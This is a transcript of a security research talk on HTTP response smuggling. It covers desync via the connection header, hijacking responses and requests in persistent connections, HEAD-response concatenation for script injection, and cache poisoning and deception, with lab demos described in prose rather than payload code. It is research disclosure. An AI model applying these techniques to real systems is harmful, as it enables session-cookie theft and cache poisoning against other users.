- Hello. My name is Martin Doyhenard. I’m a security researcher at the Onapsis Labs.
00:07 - And today I’m going to present a new set of techniques that can be used to obtain control over the response queue in a persistent connection by exploiting different HTTP desynchronization vulnerabilities.
00:20 - The agenda for today. First, I’m going to make a quick recap on HTTP request smuggling.
00:26 - And even though I expect the most of you already know what request smuggling is, I’m still going to make a quick introduction.
00:32 - And then we’ll also talk about desynchronization variants, and about one in particular that will be used through the same, through the rest of the presentation for both demos and examples.
00:43 - After this introduction, I’m going to explain what is response smuggling and how to use it for different malicious purposes.
00:50 - And I will show how to hijack responses and requests from a persistent connection, and how to obtain reliable results in real systems.
00:59 - Next, I’m going to demonstrate how to concatenate multiple responses and build malicious payloads to take control of the victim’s browser. And also using this, I will demonstrate how to poison the whole cache of a, of an HTTP proxy, by storing a crafted message as the response of any endpoint the attacker wants.
01:17 - Finally, I’ll explain how to split responses and inject arbitrary messages that will be stored in the response queue and will be delivered back to other clients by the proxy.
01:32 - So, request smuggling is an attack introduced in 2005 by Watchfire which abuses the differences between a front end and a back end server.
01:42 - These differences are related to the way the HTTP parser calculates the body length of our request.
01:47 - And this, the idea is to, the attacker sends a request containing multiple message length headers such as content-length or different (indistinct) encodings.
01:58 - And if the front end calculates the length of the body using a different header, then it will be possible to split the request and inject the prefix for the next message.
02:10 - Let’s see an example of this in which two content-length headers are sent in the same request.
02:17 - In this example, the proxy will only use the first content-length if multiple headers with the same name you are sent.
02:24 - And the back end will instead only use the last content-length to calculate the body size.
02:30 - When the attacker sends this request, the front end will forward the entire message, as it will think that the body is 32 bytes.
02:39 - However, when this message reaches the back end, only the first five bytes of the body will be considered to be part of the request.
02:46 - The extra 27 bytes will be split and used as the prefix of the next request processed by the back end.
02:53 - If a victim’s request arrives after the attacker’s one, it will be concatenated to the injected prefix, causing the back end to believe that the victim issued a request to “DeleteMyAccount” where, when instead it was issued to the “myAccount” endpoint.
03:10 - And, as the session cookies of victim are also included, the application will probably delete his account.
03:16 - But also the response of this request will be sent back to the victim.
03:29 - But these attacks were forgotten for many years, as they were thought to be, that they wouldn’t be used in real systems.
03:38 - But this changed in 2019, when James Kettle “reborned” this idea by providing a new methodology to, first, detect different desynchronization vulnerabilities, then, confirm that it is possible to use them to smuggle our request, and finally, to explore and exploit the different features provided by the web application.
03:59 - What’s more, he was able to demonstrate that these techniques could be applied in many real systems, and it was possible to collect a lot of bounties from different vendors.
04:09 - Also in 2019 and 2020, many of these desynchronization variants were presented by researchers.
04:17 - These are techniques that can be used to force the discrepancy between servers by hiding messages in the headers, such as the content-length, from a specific parser.
04:26 - In most cases, this is done by placing extra special characters, such as a space or an unprintable letter.
04:33 - And in this way, a server will fail to recognize the header name or the value as a valid content-length header.
04:43 - But even though these flaws can be found in many parsers, it is also possible to cause desynchronization by using a feature that is provided just by the HTTP protocol itself.
04:54 - And to understand this technique, first, I’ll explain the difference between an end-to-end and a hop-by-hop header.
05:00 - So, end-to-end headers are those that are intended to travel from the client to the back end server, and forwarded by any proxy in the middle.
05:09 - On the other hand, hop-by-hop headers are intended to travel only to the next node in the communication chain.
05:14 - And for this reason, proxies must not forward these headers, and they should be removed from the request before being forwarded.
05:21 - And one of the most interesting hop-by-hop headers defined in the HTTP RFC is the connection header.
05:29 - This directive can be used to specify connection options that could be used to establish and maintain the connection between two nodes.
05:37 - And these options must not affect other connections.
05:41 - So again, they should not be forwarded by any proxy receiving them.
05:46 - Some of the known collection options are “close” or “keep-alive”, but also the protocol allows the client to declare any custom value he wants.
05:55 - And also allows to use these connection options as an extra header to give the proxy or the servers more information on how to persist the HTTP communication.
06:04 - So let’s see an example of a request containing two connection options.
06:09 - First, the client will declared them as a connection value, and then, the two options are also declared as separated headers.
06:17 - But when a proxy forwards this request, it will remove both the option and keep-alive header, and as well as all the connection directives.
06:27 - But what if instead of specifying some useless value as a connection option, we declare an end-to-end header such as the content-length.
06:35 - When the proxy receives the request, it will consider the bodies of 13 bytes, and it will forward it.
06:41 - But before it does, it will remove the content-length header as it was declared as a connection option.
06:47 - So when the back-end receives this, it will think that the body is empty and it was split the message.
06:53 - This would cause that the smuggled data is used as the prefix for the next arriving request.
07:01 - Now this issue was reported under the Google vulnerability reward program, and Google fixed it, confirmed that it was possible to use it to smuggle requests in older public domains.
07:16 - Now let’s see how this desynchronization vulnerabilities can be leveraged to produce useful exploits in web applications.
07:24 - First, we could use request smuggling to bypass front-end controls, such as filters to forbidden endpoints.
07:29 - And this can be done by smuggling the forbidden request, which will not be seen by the proxy, and will be forwarded to the backend.
07:37 - However, this technique does not bypass authentication for most resources, and in most real applications, it will fail if the response is not received by the attacker, and if the filter is not placed in the vulnerable proxy.
07:51 - Another exploitation technique is hijacking the victim’s request, but this can only be done if the web application offers some data storage feature.
08:01 - That is, the attacker can only hijack victim information if it can be stored or retrieved, which is not that common in all applications.
08:11 - And also these kind of features are offered only to, or in most cases, are only offered to authenticated users.
08:19 - So the attacker would need to have a valid account or a valid session.
08:23 - Next, we can use request smuggling to upgrade existing vulnerabilities, such as cross-site scripting.
08:29 - But in this case, the attacker will be able to distribute the payload without having to interact with the victim.
08:35 - And in this case, you will not have to force the, the client to trigger the attack in some action.
08:43 - The same idea could be applied for any vulnerability regrading interaction, such as an open redirect, but to do this, or to improve these kinds of vulnerabilities, the attacker needs first to find another vulnerability, such as the cross-site scripting, because if not, there will be nothing to be upgraded.
09:03 - And finally, the desynchronization vulnerabilities can be used to perform different web cache attacks, such as web cache poisoning.
09:11 - And this can be done by modifying the response for caching a resource, by playing a prefix in the backend’s request.
09:18 - However, this is only possible to, it’s only possible to poison resources that were cacheable, and only if the proxy ignores the cache-control header.
09:29 - If this is not the case, then the malicious response will not be stored by the web cache, and the attack will fail.
09:36 - Some other techniques might also be possible.
09:40 - But in most cases, it is required that the system provides some rather uncommon features, or have other vulnerabilities, so I’m not going to talk about them.
09:51 - So… (clears throat) By now, all attacks rely on injecting a prefix in the request queue of a persistent connection.
10:04 - However, exploiting these might not be as trivial as you would like.
10:08 - There are many (indistinct) to successfully take advantage of these vulnerabilities.
10:12 - So we would like to look for other options.
10:16 - But what if instead of placing focus on the request, we would look at attacks effecting the response queue of the connection? With this in mind, I started thinking about what would happen if instead of injecting a prefix for the next message, we will smuggle a complete request that will alone produce an extra response.
10:35 - If this happens, the proxy will issue one request, but it will receive two different responses from the, from the backend.
10:42 - And if a victim later sends another message to the proxy, it will be forwarded, but in this case, the remaining extra response, which corresponds to the (indistinct) request will be sent back to the victim.
10:56 - And as the victim’s response got desynchronized too, an attacker could then send another request to hijack the form response.
11:05 - And if this response was issued after a login message, for example, then the attacker will be able to receive some sensitive information, such as the session cookies or any other session token that was intended to the victim.
11:23 - To better understand this technique, let’s see how requests and responses are associated at the proxy and at the backend.
11:31 - First, both the attacker and the victim will send a request to the front end.
11:37 - They will be stored in the request queue and forwarded to the backend server through the same connection.
11:44 - However, when the malicious payload reaches the backend, it will get split, producing two different responses.
11:51 - And now all three responses, the two that were generated by the attacker and the one generated by the victim, will go back to the proxy.
12:00 - Here, the first, the first response would be forwarded to the attacker.
12:05 - And the second one, which corresponds to the smuggled message, would be forwarded to the victim.
12:11 - However, as the proxy only issued two requests, it will wait for a new, for a new message before it can, before it can forward the last response.
12:21 - In this case, if the attacker is able to send a new message, he will be obtaining, he will end up obtaining the victim’s response, and in that response, also some sensitive information, such as, as we already said, for example, the session cookies that were, that were created after a login request.
12:43 - But what if instead, what if we tried to use these techniques in real, in real systems.
12:50 - We would find that the results that we obtain are, are not as we expected.
12:54 - And that their reliability of these attacks can make us think that they are not as useful as it sounds.
13:02 - So here we can see some, the communication between the proxy and the backend.
13:06 - And in this capture, an attacker was trying to desynchronize the response queue, but each time a request was sent, the connection was closed by the proxy.
13:18 - This means that the attack is failing. And the reason for this is that the, the proxy resets the connection every time it receives an extra response.
13:30 - And therefore we cannot send extra responses before the proxy creates a new request.
13:40 - And only after a thousand requests, I was able to smuggle a single response, and actually hijack a victim’s message.
13:49 - But of course, this is not the desired or expected result.
13:53 - So why this is happening? And to understand this, first let’s take a look at what’s going on under the hood.
14:03 - And to do so, I will explain one concept that was introduced in HTTP 1. 1.
14:10 - And in which all the desynchronization attacks rely on.
14:15 - First, remember that the biggest change between HTTP 1. 2 or 1. 1 is the ability to persist TCP connections and just send multiple request and response pairs through the same connection.
14:28 - This means that the client is not forced anymore to close the connection after receiving a response.
14:33 - Instead, it could use it to send more messages, increasing the performance of the network.
14:38 - However, this concept is sometimes confused with another important feature that is provided by the HTTP protocol, which is the ability to pipeline different messages through the same connection.
14:56 - So, HTTP pipelining is what allows a client to send multiple requests without having to wait for previous responses.
15:05 - This means that if a client needs to send, let’s say, two requests, to the same server.
15:10 - This can be done at the same time, concatenating them through the same channel.
15:15 - And it is the job of the server or the, or the proxy, to split them and resolve each, producing the corresponding responses.
15:24 - And as we saw in previous examples, the way each request is matched with its response depends only on the order they were received and forwarded.
15:35 - The first response would correspond to the first request, and this will be done by using the first-in-first-out scheme order.
15:43 - And that’s why we will call them request and response queues, because they will actually work as queues.
15:50 - There is no other way of matching different responses and requests, such as an ID or anything.
15:57 - So the only way to do it is using the order that where they were issued and they were received.
16:06 - But here’s the catch: Most proxies won’t enforce pipelining, meaning that if two or more requests from different sources reach the proxy, they will be concatenated, they won’t be concatenated together, and they will be, they won’t be forwarded together to the backend server.
16:25 - Instead, they will be sent through different free TCP connections, which won’t affect each other.
16:31 - And so the attacker won’t be able to play with the connection queue of the victim, and this will prevent the attack.
16:40 - But also future requests, or future client requests, which in the server, won’t go through the same connection that the attacker used previously.
16:48 - And this is because the extra response injected by the attacker is received by the proxy, and will be interpreted as a communication error.
16:57 - This is because the proxy did not issue any, any new requests, and so it shouldn’t be receiving any extra response.
17:05 - If this happens, then the proxy will think that there is a problem in the communication, and will just close the connection.
17:13 - And also, when closing this connection, the extra response that was received will be discarded, and so it won’t affect any, any future requests.
17:24 - So what can an attacker do to solve this problem? First to hijack our response, an attacker would need to smuggle two responses, but they cannot be sent back together to the proxy, because as we saw in this case, the proxy will close the connection because it will see an extra response.
17:44 - So to avoid this, a new request must be forwarded by the proxy, so when the response arrives, the connection is persisted.
17:54 - But these new requests can only be sent after the first response goes back to the proxy.
17:59 - This is because the proxy won’t forward any other requests through the same connection until the request, until the request queue of this connection is free.
18:09 - So the idea will be to send a time-consuming request as this final message, and this request will take some time to be processed, and the server would take some time to generate a response for this request.
18:25 - And this time will be just enough for the next victim’s message to reach the proxy and reach the proxy’s request queue.
18:35 - Therefore, when the response is forwarded back, it would be sent back to the client, and the attacker will now be able to send a fast request and hijack the extra response, which in this case, is the response that was issued for the, for the victim.
18:53 - It’s not necessarily that this (indistinct) request take a lot of time.
18:56 - It is just about knowing that, it’s just about knowing this time, and calculate the transmission time, to play with them.
19:05 - This will allow an attacker to know the best time between payloads, and the best time that he has to wait before sending the next attack.
19:16 - And, under normal conditions using different proxies and backend servers, I was able to observe huge improvements. Okay? So I was able to actually see how these requests are being smuggled and the connection is being persisted.
19:31 - And as you can see, the same attack using a different smuggled endpoint will, will give much, much better results.
19:39 - In this case, the connection was persisted for 14 requests.
19:43 - This means that the responses were desynchronized for 14 clients.
19:48 - And that is a really, really good number, if we think that before we were only getting one of a thousand.
20:05 - And so, if we are able to inject complete requests that will produce an extra response, what would stop us from injecting multiple messages? From a technical perspective, it’s the same to smuggle 1, 2, or 10 requests, that would produce 1, 2, or 10 extra responses.
20:23 - And this will be useful for other, more complex exploits, but for now, we can see that there are some simple attacks that we can, that we can perform and that we can leverage from these techniques.
20:49 - If we send instead of one, many different smuggled requests that will produce this payload, then we will be able to poison the next N amount of clients.
21:04 - Also, nested requests can be used to consume resources from both the backend and the front end server, and as well, requests can produce multiple messages that would need to be processed at the backend.
21:18 - This could consume a lot of CPU time. And as the responses must also generate, sorry, and thus the responses must also be generated, and in some case stored, then this could affect also the memory buffer of the application.
21:35 - But it could also combine nested injections with classic request smuggling technique.
21:42 - And if an application with a desync vulnerability allows for content reflection, even if this reflected parameter is properly encoded, it is possible to also hijack a request from the victim, instead of only a response.
21:57 - And this will be done by smuggling two different messages.
22:01 - The first one will be an HTTP request, as we already saw, which only propose is to desynchronize the response queue, just as we, I explained previously.
22:12 - And next, the second smuggled request, will not be completed, and will, will try to reflect some, some data that is, that is also concatenated with it.
22:25 - This is done, as in any other request smuggling attack, by using a content-length that is greater than the body of the, of the request.
22:37 - So, as always the first response will be sent back to the attacker.
22:41 - And this will allow that the new victim’s request arrive to the backend, because if not, as we saw, the proxy won’t forward the request through the, through the TCP connection.
22:55 - After this, the sleeper request will get resolved and the response will be forwarded to the victim.
23:03 - Now, if this last smuggled request contained a large content-length, it would be used as the, sorry, it would use the victim’s request as part of the body, but it was still need more data.
23:16 - And as the connection is empty, and the attacker can now send a large request that will complete the body, it will cause that the response containing the victim’s request as the reflected data, is sent back to the attacker.
23:30 - So after seeing this work in a real system, I was kind of excited, but then I started wondering, is it possible to also confuse the HTTP parser when responses are sent back? Of course, we could perform the same tricks as with desync variants, but for this, we would need to control the message length headers of the response.
23:51 - And that will probably not going to happen.
23:53 - And that’s not something that’s not going to happen.
23:56 - However, I also start thinking, is there a difference on how the length of the body is calculated between the requests and responses? And the answer, given by the HTTP RFC, is yes.
24:09 - The difference is that for some specific responses, the body must always be empty.
24:15 - And these responses are some special status codes, like the 204 and 304, but also responses that are generated out of a HEAD request.
24:28 - So what makes it so interesting, these kinds of responses, is that not only they depend on the request that generated them, but that it must always be an exact replica of the headers in the same GET response.
24:44 - So when a, when a HEAD response is generated, the only difference that we have from a GET response to the same end point will be that the body will not be there, but the rest of the headers should be the same.
24:56 - And this includes, of course, the content-length.
25:01 - Even though it is optional that the content-length appear, it does most real applications.
25:07 - And if it appears, the value will not be zero if the GET response contained a body.
25:12 - Instead, it will contain the same value, and will hope that the proxy knows that the response is special, and that it contains a content-length that should be ignored, because it’s the, it’s the response of a HEAD request.
25:28 - But if the proxy fails to match that this response was issued from a GET, from a HEAD request, then what would happen? And of course, the body, in this case, the content-length in this case, will be used, and it will indicate our own value because the HEAD response will contain no body and a content-length header with a different value than zero.
25:56 - A desynchronization will cause that requests and responses are not properly matched by the proxy.
26:01 - It would be possible to use a HEAD smuggle request to generate a malicious response.
26:06 - This will contain a content-length header, which in this case will be considered to contain the actual size of the body.
26:13 - If an attacker smuggles two requests to the backend, the first response generating, will generate the carried message, which, generated by the carried message, will go back to him.
26:26 - Next, another request will arrive to the proxy and it will be forwarded to the backend.
26:32 - Now the back end will send it, will send the first response, which in this case will be to a HEAD request.
26:39 - When this message is received by the proxy, it won’t be forwarded right away.
26:44 - This is because the content-length header states that the body is not empty.
26:47 - And the request matching this, this response contains the GET method and not the HEAD method.
26:54 - This means that if the body, if the body of the response was empty, but the content-length states that it shouldn’t be, then the proxy will wait for more data to be used, and then forward this response.
27:09 - So when the next response arrives to the proxy, it will be used as part of the body of the previous message.
27:16 - This will now be delivered back to the client, which is the, which issued the second request.
27:22 - And also the remaining of their response will be sent back to the next client issuing a request.
27:28 - But that’s only if the proxy thinks that this is a valid HTTP message, which in this case, is not.
27:37 - To understand these ideas, let’s see how the different HTTP messages travel through the connection.
27:44 - First the attacker would send its request to the proxy, which will forward it to the backend server.
27:52 - There, the message will be split into three and the first response will be sent back to the attacker, as always.
27:58 - After this, the victim will issue a new request, in this case, a GET request, but it could also be any other, except for the HEAD one.
28:08 - Their request will also be forwarded to the backend server.
28:12 - And when the smuggled response arrives to the proxy, they will be concatenated together and sent back to the victim.
28:20 - If the remaining of the split response are not a valid response, then the connection would be closed, and the response will be discarded, the extra response.
28:29 - And that is because the proxy would think that, again, there was a communication error.
28:35 - But why it could be useful to concatenate multiple responses? We were already able to control the response queue and the responses that the victim were receiving.
28:46 - So anything that we can concatenate, we could also have sent it with a single request.
28:53 - And is that right? Well, not really. And this is because we, when we concatenate two responses, one of them will have its headers used as the body of the previous message.
29:05 - This means that if the data is reflected in headers, then, which is something rather common in most applications, let’s think of a redirect or something that can allow an attacker to reflect some data in the headers of their response.
29:22 - Then an attacker would be able to reflect these in the body of the request, of their response, sorry.
29:28 - And if the headers contain any specific content-type directive, such as the text/html, then this reflected content that was present in the, in the headers will now be considered as HTML data.
29:55 - And of course this will be executed in the client’s browser.
30:00 - And the same applies for any parameter reflected in a non-scriptable content-length, content-type, sorry.
30:05 - So if we are able to reflect some content in, let’s say, the plain text type, then we can convert this to another content-type by using different headers to, to, to change the behavior of the authored response.
30:24 - And of course, this effect can be combined with other techniques to reflect other requests and responses in the message body.
30:36 - So now we will see a demo. I was able to prove all these techniques in three major vendors, but unfortunately, they were not able to fix the issues at the time of this presentation.
30:48 - So to solve this problem, I deployed a small testing lab using a (indistinct) version as the front end, and the nginx last version as the backend server.
31:04 - In this case, the (indistinct) HTTP parser is vulnerable to the desync variant that I explained previously, the connection desync variant, so it will be possible to smuggle a request using the connection header to hide the content-length.
31:20 - First, we can see that the web application consists of three endpoints, all with almost static responses.
31:27 - The paths are /home, /helloSmuggle, and also any other path we, with any other string will be used to redirect to the homepage.
31:40 - Again, Here, in the, we can see this in the Burp Repeater window.
31:47 - If I send the helloSmuggle request with the GET method, we can see that the response contains a content-length, written as zero, and a content-type header saying that the body should be treated as an HTML document.
32:00 - The same header will, with the, sorry, the same healers with the same value are obtained if a HEAD request is sent.
32:08 - And just as expected by the HTTP RFC specification.
32:14 - Also, we can see that the behavior of the redirect feature (indistinct) reflecting the query string in the location header.
32:30 - So now, using Turbo Intruder, which is another great contribution from James Kettle, I will smuggle the concatenated response, which will be sent back to the victim.
32:41 - Also consider that this demo was built using the same features found in all three mentioned vendors, and so this applies to, to many, to many real systems that can be, can be found in, in almost any, any company.
32:59 - You can see that once the attack is started, all following victim’s requests obtain the malicious response.
33:21 - But finally, if the attacks stop, if the attacker stops sending this malicious payload, then the desynchronization will conclude, and the user will see that the application works as expected.
33:43 - Still, this attack gets even worse when a web cache is available.
33:48 - Remember that the, that request smuggling could be used to poison certain endpoints with other existing responses? Well, with response smuggling, those restrictions are gone.
34:01 - An attacker would be able to poison any endpoint he wants, and the responses that can be used to, to poison these endpoint just need that the, that the HEAD response contains a cache-control header, which will cause that the message to be stored in the cache.
34:21 - And, as the attacker can send multiple pipelined requests, it is possible to poison the cache with a single request, which will be split also by the proxy.
34:30 - And this will cause that the second request gets poisoned with the response of the smuggled message.
34:38 - As an example, let’s see what happens when an attacker smuggles a HEAD cache, cacheable request.
34:44 - As you saw, the proxy will send the first response back to the attacker.
35:05 - And finally, the next request, which was also issued by the attacker, will be responded, this time with the concatenated message, which will force the web cache to store this for the future requests.
35:18 - So, when a client request, so, when a client requests for the same resource that the attacker specified, the malicious response will be sent back without the need of any instructions, because it will be stored in the cache for this specific resource.
35:37 - Again, I believe it will help to see this in the following diagram.
35:43 - As I said, the attacker will send two pipelined requests, one containing the smuggled payload, and the other specifying the URL that will be poisoned.
35:52 - This can be any endpoint that the attacker wants, even non-existent endpoints will work.
35:57 - The request will get split by the proxy and forwarded to the backend server.
36:01 - And as you can see, the messages are pipelined from the source, so this will work, even if pipelining is not enforced or even allowed.
36:10 - In this case, the request will still be enqueued in the same connection, the only difference is that they will be sent consecutively, but not concatenated.
36:23 - Now the backend server will, again, split the messages and produce four isolated responses that will, that are returned back to the proxy.
36:32 - Here, both responses will go back to the attacker, but sorry, the, yeah, both responses will go back to the attacker, but the second one will be stored in the cache for the endpoint indicated in this second pipeline request.
36:47 - So the second request that the proxy was able to recognize will be used to store the, the results of these, of the response.
37:22 - Remember that this technique can be used every time a web cache exists, as there are no extra requirements.
37:29 - Even if the cache-control header is not used, there will be at least one URL that can be used to start poisoning the cache with malicious responses.
37:38 - And that is if the, if there is a web cache existing in any proxy of the communication chain.
37:49 - And the same thing can be used to force victims into storing their own responses in the cache.
37:56 - And if their response contain sensitive, sensitive victim’s data, it will be placed in the cache, and later, an attacker can access it through the same end point that the victim requests.
38:07 - This is known as web cache deception, and in this case, it can even be used to store dynamic responses, such as those that are issued from login requests.
38:19 - They will contain among any other data, data such as session cookies or any other token that the victim will receive in his response.
38:29 - So again, in this case, the attacker can use these to store anything, and it will work as an improved cache deception attack, because in this case, as I said, the dynamic information can be stored.
38:46 - Now for the second demo, I will use the same lab in the previous example, but this time with a new endpoint, that can be cacheable.
38:55 - In this case, it will also be called “cacheable”.
38:58 - And this will be available in the homepage.
39:03 - As you can see, this is also a static resource, but in this case, the cache-control header is used to indicate that the response to this request should be stored by the web cache.
39:13 - In this attack, I will attempt to poison the /helloSmuggler endpoint to return a malicious script using the same redirect URL to inject the payload in the body of the HEAD response, as we already saw in the previous example.
39:27 - However, this time, the HEAD response will contain the cache directive and will cause that this response gets stored for any endpoint that the attacker wants.
39:37 - The same connection desync vulnerability will be leveraged to smuggle the response, and also our request for the poisoned endpoint will be placed pipelined after the malicious one.
39:49 - So the second request that we are seeing, or this, the last request that we are seeing is actually the request that will be poisoned.
40:10 - This will cause that their browser executes an eval function to open an error message, and the same effect can be caused on any end point the attacker wants.
40:38 - Finally, the last exploitation technique involves using the remaining bytes of the split response as another extra message that will also be placed in the response queue.
40:48 - Exploiting these behaviors will be almost the same as exploiting HTTP response split vulnerabilities, such as those obtained from line break header injections, and in those cases, an attacker would split our response using some reflection in the header name or in the header value, which will allow the attacker to place extra line breaks, to control the boundaries of the headers.
41:11 - In this case, the idea will be to use the HEAD, the HEAD message to split the response, which contains reflected data in this body and in these headers.
41:22 - In this reflected data, it must be possible to include line break characters to build a valid HTP response.
41:30 - This behavior is not that rare in, in reflected data is inside the body, as there is vulnerability associated with this feature.
41:39 - This is not true for line breaks for reflection in the headers.
41:43 - So that’s why it’s so rare to find them in the wild, and that’s why it’s so rare to find HTTP response split vulnerabilities.
41:53 - So again, the first non-standard response will go back to the attacker, as seen in previous examples.
41:59 - And then the following request arriving to the proxy will be forwarded through the same connection.
42:06 - The backend will send back both smuggled responses, and they will be concatenated at the proxy, which will forward the first message to the client, which issued the last request.
42:18 - And then, as in the case, as in this case, the remaining bytes are also a valid response, a valid HTTP response.
42:25 - They will be forwarded back to the next client which sends a request to the proxy.
42:29 - And this case, if the attacker was able to reflect the line break, it would be possible to set any arbitrary response, controlling both the headers and the body of the message.
42:42 - However, this attack is not that easy to perform, because it requires that the proxy either stores the response, or that the pipeline, or pipelining is allowed, and even enforced, if no web cache is available.
42:55 - So that’s why it’s hard to, to exploit this kind of, of attacks, or this kind of techniques, and why is not that easy to actually exploit HTTP response splitting vulnerabilities.
43:11 - So, some conclusions to finish. First, we can say that the response smuggling, that response smuggling does not rely on extra vulnerabilities or special conditions to work.
43:22 - This is because most of the requirements for the explained techniques rely on the features that the HTTP protocol offers.
43:29 - What’s more, almost no exploration, no exploration phase is required, and attacks presented in this talk can work only with few static endpoints, such as the one we, I showed me the, in the demo.
43:45 - Also, using response smuggling will allow an attacker to hijack both requests and responses, in all cases, fully compromising the confidentiality of the application.
43:58 - Next, using nested injections, and arbitrary cache poison, it will be possible to (indistinct) users taking valid responses from the web application, either by affecting the resources of the server, or by storing malicious payloads, replacing valid endpoints.
44:18 - What’s more, response concatenation and scripting, as well as classic request smuggling can be used to modify or control a request or response queue of a persistent connection.
44:28 - This completely compromises the integrity of the connection queue, and the web application itself.
44:45 - And finally, with a detailed analysis of the transmission and processing time, is it possible to increase the reliability of the attack and obtain these results with a few malicious requests.
44:59 - So all this should be enough for vendors to once and for all understand that a desynchronization vulnerability just by itself should be seen as one of the most critical vulnerabilities or the most critical web vulnerabilities, that a system can have.
45:16 - Now, I will answer any questions that you might have, and you can also send me any question or doubt that you have, or if you would like to talk about the subject, you can do it through my email or through my Twitter account.
45:30 - Thank you. .